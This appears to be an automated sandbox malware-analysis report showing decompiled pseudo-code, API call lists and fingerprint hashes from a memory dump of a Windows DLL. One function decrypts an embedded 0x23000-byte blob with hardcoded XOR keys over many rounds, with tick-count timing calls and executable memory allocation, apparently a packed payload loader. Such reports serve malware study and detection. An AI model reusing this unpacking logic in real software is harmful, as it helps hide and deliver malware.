                          0x6f249c9f
                          0x6f249c16
                          0x6f249ca5
                          0x6f249ca7
                          0x6f249cb4
                          0x6f249cbb
                          0x6f249cbf
                          0x6f249cc5
                          0x6f249cc8
                          0x6f249ccf
                          0x6f249cdb
                          0x6f249cdd
                          0x6f249ce1
                          0x6f249ce4
                          0x6f249ce6
                          0x6f249cf0
                          0x6f249cf2
                          0x6f249cf5
                          0x6f249cf7
                          0x6f249cf7
                          0x6f249cf9
                          0x6f249cfc
                          0x6f249d00
                          0x6f249d00
                          0x6f249d04
                          0x6f249d08
                          0x6f249d0a
                          0x6f249d0e
                          0x6f249d12
                          0x6f249d1f
                          0x6f249d23
                          0x6f249d30
                          0x6f249d34
                          0x6f249d47
                          0x6f249d4b
                          0x6f249d4d
                          0x6f249d53
                          0x6f249d53
                          0x6f249d53
                          0x6f249d53
                          0x6f249d36
                          0x6f249d41
                          0x6f249d41
                          0x6f249d25
                          0x6f249d2b
                          0x6f249d2b
                          0x6f249d14
                          0x6f249d1a
                          0x6f249d1a
                          0x6f249d57
                          0x6f249d5a
                          0x6f249d5a
                          0x6f249d5e
                          0x6f249d62
                          0x6f249d62
                          0x6f249d65
                          0x6f249d69
                          0x6f249d6b
                          0x6f249d6f
                          0x6f249d72
                          0x6f249d72
                          0x6f249d7a
                          0x6f249d7a
                          0x6f249ce6
                          0x6f249d81
                          0x6f249d87
                          0x6f249d8c
                          0x6f249d93
                          0x6f249d95
                          0x6f249d97
                          0x6f249d9b
                          0x6f249d9d
                          0x6f249d9f
                          0x6f249da1
                          0x6f249da3
                          0x6f249daa
                          0x6f249dac
                          0x6f249daf
                          0x6f249db2
                          0x6f249db2
                          0x6f249da3
                          0x6f249d9d
                          0x6f249db6
                          0x6f249dba
                          0x6f249dbe
                          0x6f249e12
                          0x00000000
                          0x6f249dc0
                          0x6f249dc0
                          0x6f249dc3
                          0x6f249dc9
                          0x6f249dcb
                          0x6f249dce
                          0x6f249dd0
                          0x6f249e14
                          0x6f249e1c
                          0x6f249e1d
                          0x6f249e1f
                          0x6f249e20
                          0x6f249e2a
                          0x6f249dd2
                          0x6f249dd2
                          0x6f249dd6
                          0x6f249dd9
                          0x6f249dde
                          0x6f249dde
                          0x6f249de8
                          0x6f249df6
                          0x6f249df8
                          0x6f249df9
                          0x6f249dfb
                          0x6f249e00
                          0x6f249e0a
                          0x6f249e0a
                          0x6f249dd0
                          0x6f249dbe

                          APIs
                          • CreateFileA.KERNEL32(asd,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6F249B65
                          • GetLastError.KERNEL32 ref: 6F249B6B
                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 6F249B87
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocCreateErrorFileLastVirtual
                          • String ID: asd
                          • API String ID: 1112224254-4170839921
                          • Opcode ID: 00a12d5202a4ecd9f9fb0fbf928d1bc4a4851b98e99107d2aa0ea058bd7867fe
                          • Instruction ID: f4108754eab2d4e9ac388403ad67c47e0d214c2c95e6928dd6d301875e4c9346
                          • Opcode Fuzzy Hash: 00a12d5202a4ecd9f9fb0fbf928d1bc4a4851b98e99107d2aa0ea058bd7867fe
                          • Instruction Fuzzy Hash: F4E1CB71A0831A8FCB18CF18CA80B5AB7E1FF88715F18456DE8558B389D7B1E865CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24A21B, Relevance: 10.6, APIs: 7, Instructions: 136COMMON
                          Download Yara Rule
                          C-Code - Quality: 87%
                          			E6F24A21B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;
				void* _t89;

				_t89 = __fp0;
				_t68 = __edx;
				_push(0x10);
				_push(0x6f287d80);
				E6F24AC90(__ebx, __edi, __esi);
				_t34 =  *0x6f28ae14; // 0x0
				if(_t34 > 0) {
					 *0x6f28ae14 = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E6F24A872();
					 *(_t82 - 4) = 1;
					__eflags =  *0x6f28b158 - 2;
					if( *0x6f28b158 != 2) {
						E6F24AB0C(_t68, 1, __esi, 7);
						asm("int3");
						_push(0xc);
						_push(0x6f287da8);
						E6F24AC90(__ebx, 1, __esi);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E6F24A3D6( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t41 = E6F24A0C1(_t61,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
									_t76 = _t41;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(_t72 == 2) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_push(_t58);
									_t42 = E6F231290(_t58, _t72, _t76, _t89,  *((intOrPtr*)(_t82 + 8)), _t72); // executed
									_t76 = _t42;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(_t76 == 0) {
											_push(_t58);
											_t45 = E6F231290(_t58, _t72, _t76, _t89,  *((intOrPtr*)(_t82 + 8)), _t42);
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E6F24A21B(_t58, _t68, _t72, _t76, _t25, _t89);
											_pop(_t61);
											E6F24A3D6( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E6F24A0C1(_t61,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E6F24A3D6( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x6f28ae14 - _t72; // 0x0
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E6F24A93D(__ebx, _t61, 1, __esi);
						E6F24A7F9();
						E6F24AC5B();
						 *0x6f28b158 =  *0x6f28b158 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E6F24A2B0();
						_t54 = E6F24AADE(_t61,  *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E6F24A2BD();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}


















                          0x6f24a21b
                          0x6f24a21b
                          0x6f24a21b
                          0x6f24a21d
                          0x6f24a222
                          0x6f24a227
                          0x6f24a22e
                          0x6f24a235
                          0x6f24a23d
                          0x6f24a240
                          0x6f24a249
                          0x6f24a24c
                          0x6f24a24f
                          0x6f24a256
                          0x6f24a2c5
                          0x6f24a2ca
                          0x6f24a2cb
                          0x6f24a2cd
                          0x6f24a2d2
                          0x6f24a2d7
                          0x6f24a2da
                          0x6f24a2dc
                          0x6f24a2ed
                          0x6f24a2ed
                          0x6f24a2f1
                          0x6f24a2f4
                          0x6f24a300
                          0x6f24a300
                          0x6f24a30d
                          0x6f24a30f
                          0x6f24a312
                          0x6f24a314
                          0x6f24a31f
                          0x6f24a324
                          0x6f24a326
                          0x6f24a329
                          0x6f24a32b
                          0x00000000
                          0x00000000
                          0x6f24a32b
                          0x6f24a2f6
                          0x6f24a2f6
                          0x6f24a2f9
                          0x00000000
                          0x6f24a2fb
                          0x6f24a2fb
                          0x6f24a331
                          0x6f24a331
                          0x6f24a336
                          0x6f24a33b
                          0x6f24a33d
                          0x6f24a340
                          0x6f24a343
                          0x6f24a345
                          0x6f24a347
                          0x6f24a349
                          0x6f24a34e
                          0x6f24a353
                          0x6f24a355
                          0x6f24a355
                          0x6f24a35b
                          0x6f24a35c
                          0x6f24a361
                          0x6f24a367
                          0x6f24a367
                          0x6f24a347
                          0x6f24a36c
                          0x6f24a36e
                          0x6f24a375
                          0x6f24a37f
                          0x6f24a381
                          0x6f24a384
                          0x6f24a386
                          0x6f24a392
                          0x6f24a3ba
                          0x6f24a3ba
                          0x6f24a370
                          0x6f24a370
                          0x6f24a373
                          0x00000000
                          0x00000000
                          0x6f24a373
                          0x6f24a36e
                          0x6f24a2f9
                          0x6f24a3bd
                          0x6f24a3c4
                          0x6f24a2de
                          0x6f24a2de
                          0x6f24a2e4
                          0x00000000
                          0x6f24a2e6
                          0x6f24a2e6
                          0x6f24a2e6
                          0x6f24a2e4
                          0x6f24a3c9
                          0x6f24a3d5
                          0x6f24a258
                          0x6f24a258
                          0x6f24a25d
                          0x6f24a262
                          0x6f24a267
                          0x6f24a26e
                          0x6f24a272
                          0x6f24a27c
                          0x6f24a288
                          0x6f24a28a
                          0x6f24a28a
                          0x6f24a28c
                          0x6f24a28f
                          0x6f24a296
                          0x6f24a29b
                          0x00000000
                          0x6f24a29b
                          0x6f24a230
                          0x6f24a230
                          0x6f24a29d
                          0x6f24a2a0
                          0x6f24a2ac
                          0x6f24a2ac

                          APIs
                          • __RTC_Initialize.LIBCMT ref: 6F24A262
                          • ___scrt_uninitialize_crt.LIBCMT ref: 6F24A27C
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Initialize___scrt_uninitialize_crt
                          • String ID:
                          • API String ID: 2442719207-0
                          • Opcode ID: 533ffa91708818e1c101db8f333fd55ff948909e9572fab07f79922fcb47e7ee
                          • Instruction ID: f63de016dcd4dca02419ac4c65d4a0add283ce2de1a2ffd47ea419e6a8f3c239
                          • Opcode Fuzzy Hash: 533ffa91708818e1c101db8f333fd55ff948909e9572fab07f79922fcb47e7ee
                          • Instruction Fuzzy Hash: D441E172D0572DEBDB19DF64C800BAE3BB5EF41BA9F00413AE8219B680D7F459519FA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24A2CB, Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                          Download Yara Rule
                          C-Code - Quality: 89%
                          			E6F24A2CB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;
				void* _t53;

				_t53 = __fp0;
				_t40 = __edx;
				_push(0xc);
				_push(0x6f287da8);
				E6F24AC90(__ebx, __edi, __esi);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E6F24A3D6( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t25 = E6F24A0C1(_t37,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t25;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							goto L16;
						}
						L8:
						_push(_t35);
						_t26 = E6F231290(_t35, _t42, _t45, _t53,  *((intOrPtr*)(_t47 + 8)), _t42); // executed
						_t45 = _t26;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
							if(_t45 == 0) {
								_push(_t35);
								_t29 = E6F231290(_t35, _t42, _t45, _t53,  *((intOrPtr*)(_t47 + 8)), _t26);
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E6F24A21B(_t35, _t40, _t42, _t45, _t14, _t53);
								_pop(_t37);
								E6F24A3D6( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E6F24A0C1(_t37,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E6F24A3D6( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(_t42 == 2) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x6f28ae14 - _t42; // 0x0
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}















                          0x6f24a2cb
                          0x6f24a2cb
                          0x6f24a2cb
                          0x6f24a2cd
                          0x6f24a2d2
                          0x6f24a2d7
                          0x6f24a2dc
                          0x6f24a2ed
                          0x6f24a2ed
                          0x6f24a2f1
                          0x6f24a2f4
                          0x6f24a300
                          0x6f24a300
                          0x6f24a30d
                          0x6f24a30f
                          0x6f24a312
                          0x6f24a314
                          0x6f24a3bd
                          0x6f24a3bd
                          0x6f24a3c4
                          0x6f24a3c6
                          0x6f24a3c9
                          0x6f24a3d5
                          0x6f24a3d5
                          0x6f24a31f
                          0x6f24a324
                          0x6f24a326
                          0x6f24a329
                          0x6f24a32b
                          0x00000000
                          0x00000000
                          0x6f24a331
                          0x6f24a331
                          0x6f24a336
                          0x6f24a33b
                          0x6f24a33d
                          0x6f24a340
                          0x6f24a343
                          0x6f24a345
                          0x6f24a347
                          0x6f24a349
                          0x6f24a34e
                          0x6f24a353
                          0x6f24a355
                          0x6f24a355
                          0x6f24a35b
                          0x6f24a35c
                          0x6f24a361
                          0x6f24a367
                          0x6f24a367
                          0x6f24a347
                          0x6f24a36c
                          0x6f24a36e
                          0x6f24a375
                          0x6f24a37f
                          0x6f24a381
                          0x6f24a384
                          0x6f24a386
                          0x6f24a392
                          0x6f24a3ba
                          0x6f24a3ba
                          0x00000000
                          0x6f24a370
                          0x6f24a370
                          0x6f24a373
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f24a373
                          0x6f24a36e
                          0x6f24a2f6
                          0x6f24a2f9
                          0x00000000
                          0x00000000
                          0x6f24a2fb
                          0x00000000
                          0x6f24a2fb
                          0x6f24a2de
                          0x6f24a2e4
                          0x00000000
                          0x00000000
                          0x6f24a2e6
                          0x00000000

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: dllmain_raw$dllmain_crt_dispatch
                          • String ID:
                          • API String ID: 3136044242-0
                          • Opcode ID: 7283617c629b340b5f48d3de658ada62b46e3d8164a7c73d3004fe3633d04a32
                          • Instruction ID: 3a53f4e478345455e816d8a96a14ed50892cd85582efde1c1573cab25c8cb88b
                          • Opcode Fuzzy Hash: 7283617c629b340b5f48d3de658ada62b46e3d8164a7c73d3004fe3633d04a32
                          • Instruction Fuzzy Hash: 2821D172D0162EABDB298F14C840EAF3E79EF81B94F004135FC255B240E3B99D519FA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23C460, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6F23C460() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("api-ms-win-core-synch-l1-2-0"); // executed
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "WakeByAddressSingle");
				}
			}




                          0x6f23c465
                          0x6f23c46d
                          0x6f23c47c
                          0x6f23c46f
                          0x6f23c47b
                          0x6f23c47b

                          APIs
                          • GetModuleHandleA.KERNEL32(api-ms-win-core-synch-l1-2-0), ref: 6F23C465
                          • GetProcAddress.KERNEL32(00000000,WakeByAddressSingle), ref: 6F23C475
                          Strings
                          • WakeByAddressSingle, xrefs: 6F23C46F
                          • api-ms-win-core-synch-l1-2-0, xrefs: 6F23C460
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: WakeByAddressSingle$api-ms-win-core-synch-l1-2-0
                          • API String ID: 1646373207-1731903895
                          • Opcode ID: 3654d53347beebf3f7d0a79b3fc72e7046d67aa61c9330e474ba70563f5e2553
                          • Instruction ID: ed2b5b3f73068bf8911d29c6733ba39bf25b382fb684a756f17f19d509fcef4b
                          • Opcode Fuzzy Hash: 3654d53347beebf3f7d0a79b3fc72e7046d67aa61c9330e474ba70563f5e2553
                          • Instruction Fuzzy Hash: 49B092B0A58959679EA06B714D0CBA63A6AE98262234184A1A261D14C0CEB09024DD22
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23C4E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6F23C4E0() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("api-ms-win-core-synch-l1-2-0"); // executed
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "WaitOnAddress");
				}
			}




                          0x6f23c4e5
                          0x6f23c4ed
                          0x6f23c4fc
                          0x6f23c4ef
                          0x6f23c4fb
                          0x6f23c4fb

                          APIs
                          • GetModuleHandleA.KERNEL32(api-ms-win-core-synch-l1-2-0), ref: 6F23C4E5
                          • GetProcAddress.KERNEL32(00000000,WaitOnAddress), ref: 6F23C4F5
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: WaitOnAddress$api-ms-win-core-synch-l1-2-0
                          • API String ID: 1646373207-1891578837
                          • Opcode ID: b591aa24b6a62e78f214751886e23bd34e99a154251688fc756805f8a0916e5f
                          • Instruction ID: cedb60146577842938987a239d14c587abc380d8253a1873a0515a05d4c60220
                          • Opcode Fuzzy Hash: b591aa24b6a62e78f214751886e23bd34e99a154251688fc756805f8a0916e5f
                          • Instruction Fuzzy Hash: FFB092B0A28A5A679EB06B724E0CBA63A6AE9516263428451E512E1480CEB4C024DD22
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F231290, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 136memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 76%
                          			E6F231290(void* __ebx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				void* _v16;
				char _v112;
				void* __ebp;
				intOrPtr _t60;
				void* _t63;
				void* _t64;
				signed int _t68;
				signed int _t69;
				signed char _t73;
				intOrPtr _t75;
				signed int _t76;
				void* _t88;
				void* _t89;
				signed int _t93;
				signed int _t94;
				void* _t108;
				void* _t109;
				intOrPtr _t111;
				intOrPtr _t114;
				signed int _t116;
				intOrPtr _t118;

				_t106 = __edi;
				_t86 = __ebx;
				_push(__ebx);
				_push(__edi);
				_t118 = (_t116 & 0xfffffff0) - 0x70;
				_t111 = _t118;
				 *((intOrPtr*)(_t111 + 0x58)) = _t114;
				 *((intOrPtr*)(_t111 + 0x5c)) = _t118;
				 *(_t111 + 0x68) = 0xffffffff;
				 *((intOrPtr*)(_t111 + 0x64)) = E6F243B10;
				_t124 = _a8 - 1;
				 *((intOrPtr*)(_t111 + 0x60)) =  *[fs:0x0];
				 *[fs:0x0] = _t111 + 0x60;
				if(_a8 != 1) {
					L14:
					_t60 =  *((intOrPtr*)(_t111 + 0x60));
					 *[fs:0x0] = _t60;
					return _t60;
				} else {
					asm("movaps xmm1, [0x6f2581d0]");
					asm("xorps xmm0, xmm0");
					asm("movaps [esi+0x30], xmm0");
					 *((intOrPtr*)(_t111 + 0x40)) = _a4;
					 *(_t111 + 0x44) = 0;
					asm("movups [esi+0x48], xmm1");
					E6F2497A0(_t124, __fp0);
					 *((intOrPtr*)(_t111 + 0x23)) = 0xf8db84f8;
					 *((intOrPtr*)(_t111 + 0x27)) = 0x392538df;
					 *((intOrPtr*)(_t111 + 0x2b)) = 0x7048fbd1;
					 *((intOrPtr*)(_t111 + 0x14)) = 0x9e9e1da7;
					 *((intOrPtr*)(_t111 + 0x18)) = 0xe0e4bd1f;
					 *((intOrPtr*)(_t111 + 0x1c)) = 0x794c6027;
					 *((short*)(_t111 + 0x20)) = 0x7ccf;
					 *((char*)(_t111 + 0x2f)) = 0x17;
					 *((char*)(_t111 + 0x22)) = 0x5e;
					_t63 =  *0x6f28adc8;
					if(_t63 != 0) {
						L4:
						_t64 = HeapAlloc(_t63, 0, 0x23000); // executed
						if(_t64 == 0) {
							goto L15;
						} else {
							 *(_t111 + 0xc) = _t64;
							E6F24AE10(_t64, 0x6f258220, 0x23000);
							_t68 = 0;
							asm("o16 nop [cs:eax+eax]");
							do {
								_t108 = 0xfffdd000;
								_t88 = _t111 + 0x14;
								_t93 = 0;
								 *((intOrPtr*)(_t111 + 0x10)) = _t68;
								do {
									_t69 = _t93;
									_t93 = _t93 + 1;
									_t73 =  *(_t88 + (_t69 * 0x88888889 >> 0x20 >> 3) - (0x88888889 << 4)) & 0x000000ff;
									_t88 = _t88 + 1;
									 *( *(_t111 + 0xc) + _t108 + 0x23000) =  *( *(_t111 + 0xc) + _t108 + 0x23000) ^ _t73;
									_t108 = _t108 + 1;
								} while (_t108 != 0);
								_t68 =  *((intOrPtr*)(_t111 + 0x10)) + 1;
							} while (_t68 != 0x3e9);
							_t89 =  *(_t111 + 0xc);
							_t75 = 0;
							asm("o16 nop [cs:eax+eax]");
							do {
								_t109 = 0xfffdd000;
								_t94 = 0;
								 *((intOrPtr*)(_t111 + 0x10)) = _t75;
								asm("o16 nop [eax+eax]");
								do {
									_t76 = _t94;
									_t94 = _t94 + 1;
									 *(_t89 + _t109 + 0x23000) =  *(_t89 + _t109 + 0x23000) ^  *(_t109 + _t111 + 0x23 + (_t76 * 0x4ec4ec4f >> 0x20 >> 2) * 0xfffffff3 + 0x23000) & 0x000000ff;
									_t109 = _t109 + 1;
								} while (_t109 != 0);
								_t75 =  *((intOrPtr*)(_t111 + 0x10)) + 1;
								_t132 = _t75 - 0x3e9;
							} while (_t75 != 0x3e9);
							 *(_t111 + 0x68) = 0;
							 *(_t111 + 0x30) =  *(_t111 + 0xc);
							_push(_t111 + 0x30);
							E6F249990(_t132);
							HeapFree( *0x6f28adc8, 0,  *(_t111 + 0xc));
							goto L14;
						}
					} else {
						_t63 = GetProcessHeap();
						if(_t63 == 0) {
							L15:
							E6F256C30(_t86, 0x23000, 1, _t106, _t111, __eflags);
							asm("ud2");
							_push(_t114);
							return E6F231000( *((intOrPtr*)( &_v112 + 0xc)), 0x23000);
						} else {
							 *0x6f28adc8 = _t63;
							goto L4;
						}
					}
				}
			}
























                          0x6f231290
                          0x6f231290
                          0x6f231293
                          0x6f231294
                          0x6f231299
                          0x6f23129c
                          0x6f23129e
                          0x6f2312a4
                          0x6f2312a7
                          0x6f2312ae
                          0x6f2312bf
                          0x6f2312c2
                          0x6f2312c5
                          0x6f2312cc
                          0x6f23143a
                          0x6f23143a
                          0x6f23143d
                          0x6f23144a
                          0x6f2312d2
                          0x6f2312d5
                          0x6f2312dc
                          0x6f2312df
                          0x6f2312e3
                          0x6f2312e6
                          0x6f2312ed
                          0x6f2312f1
                          0x6f2312f6
                          0x6f2312fd
                          0x6f231304
                          0x6f23130b
                          0x6f231312
                          0x6f231319
                          0x6f231320
                          0x6f231326
                          0x6f23132a
                          0x6f23132e
                          0x6f231335
                          0x6f231349
                          0x6f231351
                          0x6f231358
                          0x00000000
                          0x6f23135e
                          0x6f231368
                          0x6f23136c
                          0x6f231374
                          0x6f231376
                          0x6f231380
                          0x6f231380
                          0x6f231385
                          0x6f231388
                          0x6f23138a
                          0x6f231390
                          0x6f231390
                          0x6f231397
                          0x6f2313a4
                          0x6f2313ab
                          0x6f2313ac
                          0x6f2313b3
                          0x6f2313b3
                          0x6f2313b9
                          0x6f2313ba
                          0x6f2313c1
                          0x6f2313c4
                          0x6f2313c6
                          0x6f2313d0
                          0x6f2313d0
                          0x6f2313d5
                          0x6f2313d7
                          0x6f2313da
                          0x6f2313e0
                          0x6f2313e0
                          0x6f2313e7
                          0x6f2313fc
                          0x6f231403
                          0x6f231403
                          0x6f231409
                          0x6f23140a
                          0x6f23140a
                          0x6f231414
                          0x6f23141b
                          0x6f231421
                          0x6f231422
                          0x6f231435
                          0x00000000
                          0x6f231435
                          0x6f231337
                          0x6f231337
                          0x6f23133e
                          0x6f23144d
                          0x6f231457
                          0x6f23145c
                          0x6f231460
                          0x6f23147b
                          0x6f231344
                          0x6f231344
                          0x00000000
                          0x6f231344
                          0x6f23133e
                          0x6f231335

                          APIs
                            • Part of subcall function 6F2497A0: GetTickCount64.KERNEL32 ref: 6F2497D6
                            • Part of subcall function 6F2497A0: GetTickCount64.KERNEL32 ref: 6F2497F4
                            • Part of subcall function 6F2497A0: GetTickCount64.KERNEL32 ref: 6F24980D
                            • Part of subcall function 6F2497A0: GetTickCount64.KERNEL32 ref: 6F24980F
                            • Part of subcall function 6F2497A0: GetTickCount64.KERNEL32 ref: 6F249816
                            • Part of subcall function 6F2497A0: GetTickCount64.KERNEL32 ref: 6F249834
                          • GetProcessHeap.KERNEL32 ref: 6F231337
                          • HeapAlloc.KERNEL32(03230000,00000000,00023000), ref: 6F231351
                          • HeapFree.KERNEL32(00000000,?), ref: 6F231435
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
